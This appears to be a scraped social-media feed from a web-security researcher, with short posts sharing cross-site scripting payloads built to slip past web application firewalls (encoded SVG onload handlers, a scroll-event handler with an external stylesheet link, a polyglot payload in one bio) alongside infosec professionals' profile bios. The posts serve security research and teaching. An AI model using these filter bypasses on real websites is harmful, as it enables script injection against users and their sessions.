This might trick some #XSS filters out there, including CloudFlare's.
<Svg OnLoad="alert//>%0A(1)"
07.05.2025 15:47 β π 1 π 0 π¬ 0 π 0
If you learn a #hacking technique but can't make it work, it's because you understand the example, not the technique.
21.11.2024 23:22 β π 2 π 0 π¬ 0 π 0
Nice work in the original payload below.
Although "style=" (and "<link") being easily caught by most cloud WAFs I've seen out there, I've just made it shorter and "bypass friendly".
<p><dd onscrollsnapchange=alert(1)>
<link href=//X55.is/k rel=stylesheet>
PoC: brutelogic.com.br/xss.php?a=%3...
21.11.2024 19:45 β π 2 π 1 π¬ 0 π 0
brutelogic.com.br/blog/buildin...
21.11.2024 11:37 β π 1 π 0 π¬ 0 π 0
Some neat #XSS tricks to #Bypass #WAF in URL Context
=> HTMLi + Double Encoding + Embedded bytes
JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"
=> + Octal Encoding
JavaScript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"
Lab: brutelogic.com.br/dom/sinks.ht...
19.11.2024 15:35 β π 4 π 0 π¬ 0 π 0
Iβm so happy to see all my old twitter friends and no nefarious billionaires!!
18.11.2024 01:00 β π 45218 π 2222 π¬ 1029 π 78
Thank you, appreciate it.
18.11.2024 09:44 β π 1 π 0 π¬ 0 π 0
<XSS OnBlueSky=import(X)>
17.11.2024 23:37 β π 4 π 0 π¬ 1 π 0
#PenTesting?
Script your Password Spray.
29.08.2024 22:06 β π 1 π 0 π¬ 0 π 0
Interested in web security, bug bounties, machine learning and investing. SolidGoldMagikarp
javascript:/*--></title></style></textarea></script></xmp><svg/onload='-/"/-/onmouseover=1/-/[*/[]/-alert(1)//'>
https://garethheyes.co.uk/#latestBook
CWE, CVE, comedeh, susheh, etc. #vulnLife Not SushiDude on here as far as I recall.
Offensive Security Professional | Phillip Wylie Show Podcast Host | The Pentester Blueprint coauthor | TribeOfHackers Red Team | https://linktr.ee/phillipwylie
CEO, CISO, Trainer, Hacker, and Speaker.
AI + hacking + sec leadership.
ex:BuddoBot-Ubisoft-Bugcrowd-Fortify-HP-Redspin-Citrix.
Aspiring Bug Bounty Hunter & dev of tools: GAP, xnLinkFinder & waymore, featured in "Bug Hunterβs Methodology: Application Analysis v1" by JHaddix π€
RTFMπ§
founder @bugcrowd && co-founder @disclose_io || hacker, entrepreneur, executive, advisor || ΨΉΨ΅Ψ§ Ω
ΩΨ³Ω || #w00w00
Security researcher/programmer β Managing director @ HexArcana β @DragonSectorCTF founder β he/him
#infosec | #exploiter | #asm | fox | #LFC | scanner of the internet | #wordpress exploiter | #greynoise lover. | #Bugbounty hunter | Northerner | #UK
Best-selling author of Alice and Bob Learn Secure Coding & Alice and Bob Learn Application Security. Secure Code Trainer - Nerd @Semgrep #AppSec she/her
https://shehackspurple.ca π»
Builder, infosec, SCA and SAST enthusiast, blue team.
Founder of OWASP dependency-check.
https://github.com/sponsors/jeremylong
Birb stalker. Cat tree. Cyber Threat Researcher. Recovering cyber and natsec journalist. Navy vet. Meme war survivor. Creator of CyberThreaterator and Sean's Vuln Emotes (SVE) #Baltimore
@thepacketrat everywhere since 1994. https://falling-anvil.com
Full time bug bounty hunter. Look for βjoaxcarβ on other platforms
In your web, securing your app. Hacker, webdev, speaker, engineer. Security shoptet.cz, ex-report-uri.com, ex-teenager. HTTPS = How To Transfer Private Shπ©. Also https://infosec.exchange/@spazef0rze
Principal Application Security Engineer focused on all things #AppSec. Occasionally dabble in my own research. Also keen gamer and aspiring photographer.
πΌ: Staff Information Security Engineer at Google. π οΈ: Rosetta Flash, BitIodine. π: web security, β , βΏ, finance. Data is the most dangerous form of opinion.
